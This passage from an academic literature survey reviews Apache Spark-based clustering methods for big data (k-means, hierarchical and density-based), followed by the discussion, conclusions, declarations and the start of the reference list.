Kusuma et al. (2016) √ √ √ Sarazin, Lebbah & Azzag (2014) √ √ Gao & Zhang (2017) √ √ Thakur & Dharavath (2018) √ √ Lighari & Hussain (2017) √ √ Machine Learning Kamaruddin, Ravi & Mayank (0000) √ √ √ √ Wu et al. (2017) √ √ Win et al. (2019a) √ √ Win et al. (2019b) √ √ Liu et al. (2019) √ √ Fuzzy Bharill, Tiwari & Malviya (0000) √ √ Shah (2016) √ √ Lavanya, Sairabanu & Jain (2019) √ √ Pang et al. (0000) √ √Statistics Chakravorty et al. (2014) √ √ √ √ Wang et al. (2016) √ √ √ Sinha & Jana (2016) √ √ Backhoff & Ntoutsi (2016) √ √ √ Ding et al. (2017) √ √ Sharma, Shokeen & Mathur (2016) √ √ Ben HajKacem, Ben N’Cir & Essoussi (2017) √ √ √ √ Ben HajKacem, Ben N’cir & Essoussi (0000) √ √ √ √ Zayani, Ben N’Cir & Essoussi (2016) √ √ √ Chitrakar & Petrovic (2018) √ √ Fatta & Al Ghamdi (2019) √ √ Zhang et al. (2019) √ √ Solaimani et al. (2014) √ √ √ √ K-means Scalable Mallios et al. (0000) √ √ Guo, Zhang & Zhang (2016) √ √ Ianni et al. (2020) √ √Data Mining Lee & Kim (2018) √ √ Sarazin, Azzag & Lebbah (2014) √ √ √ Machine Learning Malondkar et al. (2019) √ √ √ √ Jin et al. (2015) √ √ Solaimani et al. (0000) √ √ √ √ Hierarchical Scalable Hassani et al. (2016) √ (continued on next page) Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 10/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Table 1 (continued) Category Sub-category Paper Supported Big Data Characteristic Validated on volume variety velocity Real Synthetic Rui et al. (2017) √ √ Zhou & Wang (0000) √ √ √ Kim et al. (2018) √ √Graph Lulli, Dell’Amico & Ricci (2016) √ √ √ Han et al. (2018a) √ √ Hosseini & Kourosh (2019) √ √ √Data Mining Aryal & Wang (2018) √ √ Hosseini & Kiani (2018) √ √ √ Corizzo et al. (2019) √ √ √ √Machine Learning Liang et al. (2017) √ √ √ Luo et al. (2016) √ √ Han et al. (2018b) √ √ √ Baralis, Garza & Pastor (2018) √ √ Density Scalable Gong, Sinnott & Rimba (0000) √ √ • Answer to Q4: Some existing works employed optimization techniques to improve clustering results. These optimization techniques were mainly used with k-means methods as discussed in ‘Fuzzy based Methods’ and ‘Clustering Optimization’. • Answer to Q5: The pros and cons of the different methods are discussed in the ‘k-means based Clustering’, ‘Hierarchical clustering’ and ‘Density based-clustering’, that discuss the different types of Spark-based clustering methods. We also discuss our findings related to the Spark-based clustering methods in ‘Discussion and Future Direction’. k-means based clustering This method divides the data into disjoint clusters of similar points. In each cluster, a central point is obtained via a distance function and is considered as the centroid of all other points within the cluster. The clusters are iteratively optimized until an optimal solution is reached. k-mean is a framework of clustering or a family of distance functions, which provides the basis for different variants of k-mean algorithms. k means is extensively used in clustering big data due to its simplicity and fast convergence. One major backward of k-means is the priori setting of the number of clusters, which have significant effect on the accuracy of final classification (Hartigan, Wong & Algorithm, 1979). In addition, k-means is not suited in situations where the clusters do not show convex distributed or vary in sizes (Jain, 2010). Due to these limitations, several modifications of k -means have been proposed such as fuzzy k-means and k-means++ (Huang, 1998). Several works have been conducted to execute k-means effectively under the Spark framework to improve its performance and scalability. Therefore, the Spark-based k-means methods can be divided into four subcategories: Machine Learning based methods, Fuzzy based methods, Statistics based methods and Scalable methods. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 11/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Machine learning based methods The authors of Kusuma et al. (2016) designed intelligent k-means based on spark. Intelligent k-means is a fully unsupervised learning that cluster data without any information regarding the number of clusters. A parallel implementation of biclustering using map-reduce over Spark platform was proposed by Sarazin, Lebbah & Azzag (2014). For improving the selection process of k-means, (Gao & Zhang, 2017) combines Particle Swarm Optimization and Cuckoo-search to initiate better cluster centroid selections using spark framework. The work in Thakur & Dharavath (2018) proposes a hybrid approach that integrate k-means and decision tree to cluster and detect anomaly in big data. At first, k-means is applied on the data to produce the clusters and then decision tree algorithm is applied on each cluster to classify normal and anomaly instances. In Lighari & Hussain (2017) the author combines rule based and k-means algorithm for the detection of network anomalies using apache spark. Rule based is used for the detection of known attacked, while k-means is used as unsupervised learning for the detection of new unknown attacks. Kdd cup dataset was used to evaluate the algorithm and 93% accuracy was achieved. A paralleled algorithm for the evolving clustering method was proposed by Kamaruddin, Ravi & Mayank (0000). EMC is an online method which process one data sample on a single pass and there is no iteration required to process the same data again. These features make the algorithm highly efficient for processing contemporary real time applications where data arrive in a stream with high dimensionality. The authors evaluated the proposed algorithm using massive credit card fraud dataset and the results show its superiority over the traditional single EMC method. Fuzzy based methods The authors of Wu et al. (2017) proposed a parallel implementation of fuzzy consensus clustering for on the Spark platform for processing large scale heterogenous data. The authors of Win et al. (2019a) developed a crime pattern-discovery system based on fuzzy clustering under Spark. The method uses L2 norm rather than Euclidian distance to optimize the distance computations. In another paper, the fuzzy clustering method is used under Spark to detect potential criminal patterns in large-scale spatiotemporal datasets (Win et al., 2019b). In Liu et al. (2019) the authors developed a parallel Fuzzy based image segmentation algorithm for handling big data in the agriculture field. At first, the images were converted to RGB and distributed to the available nodes in cloud. Then, the membership of pixel points to different cluster centroids were calculated. Finally, the centroids of the clusters are updated iteratively until an optimal solution is obtained. The performance of the algorithm was evaluated using the Spark platform and a significant reduction in execution time compared to Hadoop-based approach. The authors of Bharill, Tiwari & Malviya (0000) proposed an algorithm of fuzzy c-Means. The proposed algorithm is a modification of the Scalable Random Sampling with Iterative Optimization (SRSIO-FCM). The highlighted characteristics of this research were the elimination of the need for maintaining the membership matrix, which proved pivotal in reducing execution time. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 12/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Statistics based methods The authors of Shah (2016) used Apache Spark to perform text clustering. Two algorithms were used: k-means and LDA. LDA is Widely used technique for clustering high dimensional text data and it produces considerably higher clustering accuracy than conventional k- means. In Lavanya, Sairabanu & Jain (2019) the authors used gaussian mixture model on spark MLlib to cluster the zika virus epidemic. The produced clusters were useful to visualize the spread of the virus during the epidemic. The authors of Pang et al. (0000) implemented GMM clustering method under the framework of Spark. Gibbs sampling method is used instead of Expectation Maximization algorithm to estimate the parameters of the model. The efficiency of the algorithms was verified via multi-method comparison. The authors in Chakravorty et al. (2014) presented a novel distributed gaussian based clustering algorithm for analysing the behaviour of households in terms of energy consumption. Various factors such as weather conditions, type of day and time of the day were considered. The proposed algorithm under Spark shows a higher accuracy than other standard regression methods for energy consumption forecasting. Scalable methods A parallel implementation of k means algorithm over spark is proposed in Wang et al. (2016). The proposed algorithm involves three strategies for seeding: (1) a subset of data is selected randomly for partitioning. (2) sequentially selecting k instance based on probability. (3) stochastically selecting seeds in parallel. The efficiency of the proposed algorithm was demonstrated via experiments on large scale text and UCI datasets. In another paper, the authors addressed the issue of pre-determining the number of input clusters which is a present problem in most K-means methods by automating the number of input clusters which resulted in better clustering quality when processing large scale data (Sinha & Jana, 2016). In Backhoff & Ntoutsi (2016), the authors presented a scalable k-means algorithm based on spark streaming for processing real time- data. The algorithm consists of two parts. One part runs an online algorithm over the stream data and obtains only statistically relevant information and another part that uses an offline algorithm on the results of the former to produce the actual clusters. Since the algorithm only retains statistically relevant information, it’s possible to save more physical spaces. In addition, the proposed algorithm can explain the evolution of the data as all the needed information is retrievable from the stored statistical information. The authors of Ding et al. (2017) used k-means under Spark to cluster students’ behaviors into different categories using information gathered from universities’ information system management. It is a powerful technique for performing simultaneous clustering of rows and Columns in a matrix data format. This method is used extensively for the study of genes expression. The authors of Sharma, Shokeen & Mathur (2016) clustered satellite images in an astronomy study using in k-means++ under the spark framework. In this paper, the authors simultaneously apply k-means multiple times with different initial centroids and value of k under each iteration. The optimal value of k is determined by clusters validity index for all the executions. The work in Ben HajKacem, Ben N’Cir & Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 13/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Essoussi (2017) presented a Spark-based k-prototypes (SKP) clustering method for mixed large-scale data analysis. The authors exploit the in-memory operations of Spark to reduce the consumption time of MRKP method. The method was evaluated using simulated and real datasets under Spark and Hadoop platform and the results show that higher efficiency and scalability is achieved under Spark. The authors of Ben HajKacem, Ben N’cir & Essoussi (0000) implemented a Scalable Random Sampling for K-Prototypes Using Spark. The algorithm randomly selects a small group of data points and approximate the cluster centers from these data. As a result, the method perform computation for only small portion of the whole data set, which result in a significant speedup of existing k-prototypes methods. A Parallel Overlapping k-means algorithm (POKM) is proposed in Zayani, Ben N’Cir & Essoussi (2016). This algorithm can perform parallel clustering processes leading to non-disjoint partitioning of data. An implementation of parallel k-means with triangle inequality based on spark is proposed in Chitrakar & Petrovic (2018). The method is an improved version of k-means, which is supposed to speed up the process of analysis by skipping many point-centre distance computations, which can be beneficial when clustering high dimensional data. The authors of Fatta & Al Ghamdi (2019) implemented k-means with triangle inequality to reduce search time and avoid redundant computation. The authors point out that the efficiency of k-means can be improved significantly using triangle inequality optimisations. A distributed possibilistic c-means algorithm is proposed in Zhang et al. (2019). Possibilistic c means differ from other k-means techniques by assigning probabilistic membership values in each cluster for every input point rather than assigning a point to a single cluster. The authors of Solaimani et al. (2014) implemented an adaptive k-mean using Spark stream framework for real time-anomaly detection in clouds virtual machines. The authors evaluated the method under Spark and Storm in terms of the average delays of tuples during clustering and prediction and the results indicate that Spark is significantly faster than Storm. Mallios et al. (0000) designed a framework for clustering and classification of big data. The framework integrates k-means and decision tree learning (ID3) algorithms. the authors evaluated the framework under Spark in cluster of 37 nodes. the results show that the proposed algorithms outperform spark machine learning library but is slightly slower than the approximate k-means. Hierarchical clustering This clustering technique is composed of two approaches: agglomerative and divisive. The first approach considers every data point as a starter in its singleton cluster and the two nearest clusters are combined in each iteration until the two different points belong to a similar cluster. However, the second approach performs recursive top-down splitting. The existing hierarchical clustering methods can be divided into three subcategories: Data Mining based methods, Machine Learning based methods and Scalable methods. Data mining based methods A weighted agglomerative hierarchical clustering algorithm is introduced in Guo, Zhang & Zhang (2016). The algorithm was developed to analyse residents’ activities in China. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 14/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 The data was based on the mobile phone’s connection with the nearest stations, and within a week that data was collected and stored in Spark for analysing. At first, hot areas where there are large population were identified, followed by an analysis of pedestrian’s flow for each hot area. Meaningful information was obtained at less cost and higher accuracy than the traditional method of investigation. The work in Ianni et al. (2020) proposed a distributed-hierarchical based clustering algorithm that combines the features of the divisive and agglomerative methods. The method consists of two operations. The first operation performs a division on the domain of the dataset using the definition of binary space partition, which yields a set of coarse clusters that are then refined by identifying outliers and assigning remaining points to nearest cluster. The second operation involves an agglomerative procedure over the previously refined clusters. In Lee & Kim (0000), they proposed a Distributed-based Hierarchical Clustering System for Large-Scale Semiconductor Wafers (DHCSSW) by applying the big data Spark framework to existing hierarchical clustering algorithm. Machine learning based methods In Sarazin, Azzag & Lebbah (2014), the authors designed clustering algorithms that can be used in MapReduce using Spark platform. Particularly, they focus on the practical and popular serial Self-organizing Map clustering algorithm (SOM). Malondkar et al. (2019) proposed an algorithm called Spark-GHSOM, which scales to large real-world datasets on a distributed cluster. Moreover, it also proposed a new distance hierarchy approach for mixed attribute datasets and generated a multi-level hierarchy of SOM layers. Scalable methods In Jin et al. (2015), a parallel algorithm of Single-linkage Hierarchical Clustering was proposed by formulating the problem as a Minimum Spanning Tree problem. The algorithm was evaluated using two large datasets with different distributions. The authors observed that spark is totally successful for the parallelization of linkage hierarchical clustering with acceptable scalability and high performance. The work in Solaimani et al. (0000) proposed a system to detect anomaly for multi-source VMware-based cloud data center. The framework monitors VMware performance stream data (e.g., CPU load, memory usage, etc.) continuously. The authors of Hassani et al. (2016) presented an incremental hierarchical density-based stream clustering algorithm based on cluster stability. Density-based clustering Density-based clustering approaches in comparison with other types of clustering algorithms have some superiorities, such as clustering arbitrary shape groups of data regardless of the geometry and distribution of data, robustness to outliers, independence from the initial start point of the algorithm, and its deterministic and consistent results in the repeat of the similar algorithm. Motivated by these features, several studies have been conducted on the parallelization of Density clustering method over Spark. Density-based clustering methods can be divided into four subcategories: Graph based methods, Data Mining based methods, Machine Learning based methods and Scalable methods. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 15/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Graph based methods In Rui et al. (2017), the authors proposed a parallel implementation of density peaks clustering algorithm based on Spark’s GraphX. The method was evaluated using spark and the results indicate that spark can perform up to 10x time faster compared to Hadoop map- reduce implementation. Zhou & Wang (0000) proposed a distributed parallel algorithm of structure similarity clustering based on Spark (SparkSCAN) to cluster directed graph. Similarly, the authors of Kim et al. (2018) exploited the advantage of the in-memory computation feature of spark to design a distributed network algorithm called CASS for clustering large-scale network based on structure similarity. Optimization approaches such as Bloom filter and shuffle selection are used to reduce memory usage and execution time. Lulli, Dell’Amico & Ricci (2016) designed a distributed algorithm that produces an approximate solution to the exact DBSCAN clustering. The method uses vertex-centric instead of Euclidean distance whereby a neighbourhood graph is computed. Data mining based methods In another paper Han et al. (2018a), the authors presented a fast parallel DBSCAN algorithm using Spark to get around the shuffle operation. Each executor computes the partial clusters locally. The merging process is deferred until all the partial clusters have been sent back to the driver. In Hosseini & Kourosh (2019) the authors propose a scalable distributed density based hesitant fuzzy clustering for finding similar expression between distinct genes. The proposed method benefits from the robustness of density-based clustering against outliers and from the weighted correlation operators of hesitant fuzzy clustering to measure similarity. The output clusters are based on the content of the neighbour graph. Aryal & Wang (2018) designed and implemented a scalable Shared Nearest Neighbours clustering called SparkSNN over spark framework. Shared Nearest Neighbours is proven efficient for handling high-dimensional spatiotemporal data. The algorithm was evaluated in terms of scalability and speed-up using Marylanf crime data, the results demonstrated the effectiveness of the proposed algorithm. Machine learning based methods An algorithm based on adaptive density estimation is proposed for distributed big data approach and tested on some prevalent datasets. This algorithm has no dependency, and every step of the algorithm executes independently. Bayesian Locality Sensitive Hashing (LSH) is used to divide the input data into partitions. The outliers are filtered out by locality preservation, which makes this approach robust. The clusters are made very much homogenous via density definition on Ordered Weighted Averaging distance Hosseini & Kiani (2018). A scalable distributed density-based clustering for performing multi- regression tasks is proposed in Corizzo et al. (2019). In this work, locality sensitive hashing is used to enable the algorithm to handle high dimensional data. A distributed clustering algorithm named REMOLD is introduced in Liang et al. (2017). A two-step strategy has been applied in the REMOLD algorithm. In the first step, it uses the LSH partitioning method for balancing the effect of runtime and local clustering while in the second step the partitions are clustered locally and independently using Kernel-density and Higher-density Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 16/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 nearest neighbour. Gaussian distribution is used to model the local clusters. These models are eventually assembled at a central server to form the global clusters. Scalable methods In Luo et al. (2016), a parallel implementation of DBSCAN algorithm (S_ DBSCAN) based on spark is proposed. The algorithm is divided into three stages; partitioning the input data based on random sampling; perform local DBSCAN in parallel to generate partial clusters; merge the partial clusters based on the centroid. The algorithm can quickly realize the mergers and divisions of clustering results from the original data. The authors compared the performance of their parallel algorithm with a serial version on the Spark platform for massive data processing and an improvement in performance was demonstrated. Han et al. (2018b) proposed a scalable parallel implementation of DBSCAN algorithm in Apache spark by applying a partitioning strategy. The algorithm uses a kd-tree in order to reduce the search time. To achieve better performance and scalability, a partitioning technique is applied to produce balanced sub-domains, which can be computed within Spark executors. An implementation of DBSCAN algorithm using spark is proposed in Baralis, Garza & Pastor (2018). Initially, a pre-processing step is applied on the dataset to produce a set of representative points while retaining the original data distribution and density information. This enables the algorithm to scale up to large scale data. The new set is then used as an input to the algorithm for clustering. A real-time density-based clustering algorithm (RT-DBSCAN) is proposed in Gong, Sinnott & Rimba (0000). RT-DBSCAN is an extension of dbscan for supporting streamed data analysis. The algorithm employs the concept of spatiotemporal distance for clustering spatio-temporal data. The algorithm was implemented over spark stream and evaluated using social media content. Clustering optimization Some Spark-based clustering techniques, especially the k-means based methods, were supported by optimization techniques to improve their clustering results. Due to the rise of AI based computing in recent years, some research works have utilized AI tool in enhancing the clustering methods while leveraging the benefits of Big Data platforms such as Spark. Other studies adapt optimization techniques to improve the performance of clustering methods. Sherar & Zulkernine (2017) proposed a hybrid method composed of PSO and k-means using apache spark. The diversity of the swarm ensures that a global search is conducted, hence, the resulting cluster centroids are not dependent on the initial choice. The approach was compared with stand-alone k-means and it showed better performance in terms of convergence. Hasan et al. (2019) proposed an adaptive swarm-based clustering for stream processing of twitter data. Initially, fuzzy c-means is applied as pre-processing step to produce the initial cluster centres, then the clusters are further optimized using adaptive particle swarm optimization. The authors of Wang & Qian (2018) and (Bonab et al., 2015) combined the robust artificial bee colony algorithm with the powerful Spark framework for large scale data analysis. The characteristics of ABC makes the algorithms avoid local minimum while Spark in memory computation accelerates the speed of computation and convergence Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 17/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 time. The KDD CUP 99 data was utilized to verify the effectiveness of the method. The experimental results show that the algorithm produce high clustering quality and nearly as fast as the serial algorithms. Other unsupervised learning such as self-organised map has also been proposed (Sarazin, Azzag & Lebbah, 2014). To tackle high dimensional data, subspace clustering was proposed by Sembiring, Jasni & Embong (2010). DISCUSSION AND FUTURE DIRECTION From the discussion of the previous section, we note that most existing methods (see Table 1) have addressed the volume characteristic of the Big Data used in their experiments. However, few existing methods have shown that their methods support the variety and velocity characteristics of the used Big Data. Additionally, most methods used real Big Data validate their proposed methods as seen in Table 1. From Table 1, we conclude that there is a lot of room for research in clustering methods to support the characteristics of variety and velocity of Big data since only few works have addressed these issues. A fundamental assumption of most clustering algorithms is that all data features are considered equally important. However, such approach often fails in high dimensional space. A subspace clustering overcome the issue of high dimensional data by establishing a set of features that it supposes to be most significant for each cluster. Since the Big data platforms were only developed in the last few years, the existing clustering problems adapted to such platforms were extensions of the traditional clustering techniques. Researchers are yet to develop clustering techniques that are native to the Big Data platforms such as Spark. The research direction of adapting the optimization techniques such as PSA, Bee colony and ABC to smoothly work with Spark is yet to be investigated by researchers who are interested in clustering Big Data. Another area of research that is has not been fully investigated is adopting Fuzzy-based clustering algorithms on Spark. In general, due to the infancy of Spark-based clustering algorithms, only few researchers attempted designing techniques that leverage the potential of parallelism of Spark in cluster Big Data. In the coming years, we foresee a large influx of research works in this important area of Spark-based clustering of Big Data. Particularly, there are ample opportunities in future research to utilize AI tools in clustering data while leveraging the benefits of Big Data platforms such as Spark. In Table 2, we note that most of the papers used in this survey were extracted from the IEEE Explorer. However, the other data sources shown in Table 2 were of great benefit to this survey. An interesting finding was shown in Table 3, where most the existing Spark-based Clustering were published in the years 2016–2019. This indicates that clustering methods that leverage Big Data platforms is still in its early days and there is a lot of potential of research in this area. In summary, we highlight three new research directions: • Utilizing AI tools in clustering data while leveraging the benefits of Big Data platforms such as Spark. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 18/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Table 2 Shows the data sources of the Spark-based clustering papers. Data source Paper IEEE Explorer Dave & Gianey (2016), Hu et al. (2018), Fasheng & Xiong (2011), Ajin & Kumar (2016), Verma, Mansuri & Jain (2016), Xin et al. (2013), Xu & Tian (2015), Manwal & Gupta (2017), Shanjiang et al. (2018), Wang et al. (2016), Sinha & Jana (2016), Kusuma et al. (2016), Backhoff & Ntoutsi (2016), Ding et al. (2017), Sarazin, Lebbah & Azzag (2014), Ben HajKacem, Ben N’Cir & Essoussi (2017), Wu et al. (2017), Zayani, Ben N’Cir & Essoussi (2016), Chitrakar & Petrovic (2018), Win et al. (2019b), Liu et al. (2019), Solaimani et al. (2014), Chakravorty et al. (2014), Lighari & Hussain (2017), Jin et al. (2015), Guo, Zhang & Zhang (2016), Solaimani et al. (0000), Lee & Kim (2018), Hassani et al. (2016), Sarazin, Azzag & Lebbah (2014), Luo et al. (2016), Han et al. (2018b), Aryal & Wang (2018), Liang et al. (2017), Sherar & Zulkernine (2017), Wang & Qian (2018), Sarazin, Azzag & Lebbah (2014b) Elsevier Bhadani & Jothimani (2016), Ben HajKacem, Ben N’Cir & Essoussi (2017), Rui et al. (2017) Springer Othman et al. (2018), Baltas, Kanavos & Tsakalidis (0000), Zerhari, Lahcen & Mouline (2015), Rujal & Dabhi (2016), Sood, Akshay & Singh (2019), Ketu & Agarwal (2015), Santhi & Jose (2018), Jain (2010), Huang (1998), Ben HajKacem, Ben N’cir & Essoussi (0000), Win et al. (2019a), Gao & Zhang (2017), Pang et al. (0000), Mallios et al. (0000), Thakur & Dharavath (2018), Kamaruddin, Ravi & Mayank (0000), Han et al. (2018a), Corizzo et al. (2019), Zhou & Wang (0000), Gong, Sinnott & Rimba (0000), Bonab et al. (2015) Google Scholar Kim (2018), Sharma, Shokeen & Mathur (2016), Gousios (2018), Aziz, Zaidouni & Bellafkih (0000), Mishra, Pathan & Murthy (2018), Jiang et al. (2010), Shobanadevi & Maragatham (2017), Lavanya, Sairabanu & Jain (2019), Kim et al. (2018), Lulli, Dell’Amico & Ricci (2016), Hasan et al. (2019) ResearchGate Shoro & Soomro (2015), Salloum et al. (2016), Assefi et al. (2017), Armbrust et al. (2015), Hosseini & Kiani (2018), Hartigan, Wong & Algorithm (1979), Shah (2016), Fatta & Al Ghamdi (2019), Sarazin, Azzag & Lebbah (2014b) Science Direct Labrinidis & Jagadish (2012), Shirkhorshidi et al. (0000), Rotsnarani & Mrutyunjaya (2015), Huang et al. (2017), Zhang et al. (2019), Maheshwar & Haritha (2016), Ianni et al. (2020), Malondkar et al. (2019), Rui et al. (2017), Hosseini & Kourosh (2019) • Clustering methods to support the characteristics of variety and velocity of Big data. Additionally, support new aspects of clustering such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, and incompleteness, etc. • Clustering methods to utilize Spark as it is an efficient Big Data platform. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 19/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Table 3 Shows which papers in the survey were published in each of the last 6 years. Year of publication Papers Number of papers 2014 Wang et al. (2016), Santhi & Jose (2018), Sarazin, Lebbah & Azzag (2014), Solaimani et al. (2014), Chakravorty et al. (2014), Solaimani et al. (0000), Sarazin, Azzag & Lebbah (2014b) 8 2015 Verma, Mansuri & Jain (2016), Shoro & Soomro (2015), Bhadani & Jothimani (2016), Rotsnarani & Mrutyunjaya (2015), Shobanadevi & Maragatham (2017), Jin et al. (2015), Kim (2018), Bonab et al. (2015) 8 2016 Bhadani & Jothimani (2016), Dave & Gianey (2016), Ajin & Kumar (2016), Baltas, Kanavos & Tsakalidis (0000), Gousios (2018), Assefi et al. (2017), Maheshwar & Haritha (2016), Wang et al. (2016), Sinha & Jana (2016), Kusuma et al. (2016), Backhoff & Ntoutsi (2016), Sharma, Shokeen & Mathur (2016), Zayani, Ben N’Cir & Essoussi (2016), Shah (2016), Bharill, Tiwari & Malviya (0000), Pang et al. (0000), Mallios et al. (0000), Guo, Zhang & Zhang (2016), Hassani et al. (2016), Zhou & Wang (0000), Lulli, Dell’Amico & Ricci (2016) 21 2017 Baltas, Kanavos & Tsakalidis (0000), Salloum et al. (2016), Armbrust et al. (2015), Xu & Tian (2015), Shirkhorshidi et al. (0000), Rujal & Dabhi (2016), Ding et al. (2017), Ben HajKacem, Ben N’Cir & Essoussi (2017), Wu et al. (2017), Gao & Zhang (2017), Lighari & Hussain (2017), Kamaruddin, Ravi & Mayank (0000), Rui et al. (2017), Liang et al. (2017), Sherar & Zulkernine (2017) 15 2018 Othman et al. (2018), Hu et al. (2018), Kim (2018), Xin et al. (2013), Zerhari, Lahcen & Mouline (2015), Sood, Akshay & Singh (2019), Jiang et al. (2010), Shanjiang et al. (2018), Huang et al. (2017), Ketu & Agarwal (2015), Ben HajKacem, Ben N’cir & Essoussi (0000), Chitrakar & Petrovic (2018), Thakur & Dharavath (2018), Lee & Kim (2018), Luo et al. (2016), Han et al. (2018b), Han et al. (2018a), Kim et al. (2018), Baralis, Garza & Pastor (2018), Aryal & Wang (2018), Gong, Sinnott & Rimba (0000), Wang & Qian (2018) 22 2019 Aziz, Zaidouni & Bellafkih (0000), Win et al. (2019a), Fatta & Al Ghamdi (2019), Zhang et al. (2019), Win et al. (2019b), Liu et al. (2019), Lavanya, Sairabanu & Jain (2019), Hosseini & Kiani (2018), Corizzo et al. (2019), Hosseini & Kourosh (2019), Hasan et al. (2019), Sembiring, Jasni & Embong (2010) 12 2020 Ianni et al. (2020) 1 CONCLUSIONS As a consequence of the spread of smart devices and appearance of new technologies such as IoT, huge data have been produced on daily bases. As a result, the concept of Big Data has appeared. Unlike the traditional clustering approaches, Big Data clustering requires advanced parallel computing for better handling of data because of the enormous volume Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 20/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 and complexity. Therefore, this work contributes to the research in this area by providing a comprehensive overview of existing Spark-based clustering techniques on Big data and outlines some future directions in this area. Due to the infancy of the Big data platforms such as Spark, the existing clustering techniques that are based on Spark are only extensions of the traditional clustering techniques. There is still big room for developing clustering techniques designed specifically for Spark making use of the random distribution of data onto Spark partitions, called RDDs, and the parallel computation of data in the individual RDDs. Through this survey we found that most existing Spark-based clustering method support the volume characteristic of Big Data ignoring other characteristics. Therefore, future research should focus on other characteristics as well such as variety and velocity. Additionally, future Spark-based clustering method should investigate new features such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, etc. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received support from the Deanship of Scientific Research at Prince Sattam Bin Abdulaziz University for this research. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Deanship of Scientific Research at Prince Sattam Bin Abdulaziz University. Competing Interests The authors declare there are no competing interests. Author Contributions • Mozamel M Saeed conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. • Zaher Al Aghbari conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Mohammed Alsharidah performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: No code or raw data is involved in this research as this is a literature review. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 21/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 REFERENCES Ajin VW, Kumar LD. 2016. Big data and clustering algorithms. In: 2016 international conference on research advances in integrated navigation systems (RAINS). Bangalore, 1–5 DOI 10.1109/RAINS.2016.7764405. Armbrust MM, Xin RS, Lian C, Huai Y, Liu D, Bradley JK, Meng X, Kaftan T, Franklin MJ, Ghodsi A, Zaharia M. 2015. Spark SQL: relational data processing in spark. In: Proceedings of the ACM SIGMOD international conference on management of data (SIGMOD ’15). New York: Association for Computing Machinery, 1383–1394. Aryal AM, Wang S. 2018. SparkSNN: a density-based clustering algorithm on spark. In: IEEE 3rd international conference on big data analysis (ICBDA), Shanghai. 433–437 DOI 10.1109/ICBDA.2018.8367722. Assefi M, Behravesh E, Liu G, Tafti A. 2017. Big data machine learning using apache spark MLlib. In: 2017 IEEE international conference on big data (Big Data), Boston, MA. 3492–3498 DOI 10.1109/BigData.2017.8258338. Aziz K, Zaidouni D, Bellafkih M. 2018. Real-time data analysis using Spark and Hadoop. In: 2018 4th international conference on optimization and applications (ICOA). Piscataway: IEEE, 1–6. Aziz K, Zaidouni D, Bellafkih M. 2000. Big data optimisation among rdds persistence in apache spark. In: Tabii Y, Lazaar M, Al Achhab M, Enneya N, eds. Big data, cloud and applications. BDCA 2018. Communications in computer and information science, vol. 872. Cham: Springer. Backhoff O, Ntoutsi E. 2016. Scalable online-offline stream clustering in apache spark. Parallel implementation of density peaks clustering algorithm based on spark. In: IEEE 16th international conference on data mining workshops (ICDMW), Barcelona. 37–44 DOI 10.1109/ICDMW.2016.0014. Baltas A, Kanavos A, Tsakalidis AK. 0000. An Apache spark implementation for sentiment analysis on twitter data. In: Sellis T, Oikonomou K K, eds. Algorithmic aspects of cloud computing. ALGOCLOUD 2016. Lecture notes in computer science, vol. 10230. Cham: Springer. Baralis E, Garza P, Pastor E. 2018. A density-based preprocessing technique to scale out clustering. In: IEEE international conference on big data (Big Data), Seattle, WA, USA. Piscataway: IEEE, 2078–2087 DOI 10.1109/BigData.2018.8621870. Ben HajKacem MA, Ben N’cir CE, Essoussi N. Scalable random sampling k-prototypes using spark. In: Ordonez C, Bellatreche L, eds. Big data analytics and knowledge discovery. DaWaK 2018. Lecture notes in computer science, vol. 11031. Cham: Springer. Ben HajKacem MA, Ben N’Cir CE, Essoussi N. 2017. KP-S: a spark-based design of the K-prototypes clustering for big data. In: IEEE/ACS 14th international con- ference on computer systems and applications (AICCSA), Hammamet. 557–563 DOI 10.1109/AICCSA.2017.94. Bhadani AK, Jothimani D. 2016. Big data: challenges, opportunities, and realities. In: Effective big data management and opportunities for implementation. Hershey: IGI Global. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 22/28 https://peerj.com http://dx.doi.org/10.1109/RAINS.2016.7764405 http://dx.doi.org/10.1109/ICBDA.2018.8367722 http://dx.doi.org/10.1109/BigData.2017.8258338 http://dx.doi.org/10.1109/ICDMW.2016.0014 http://dx.doi.org/10.1109/BigData.2018.8621870 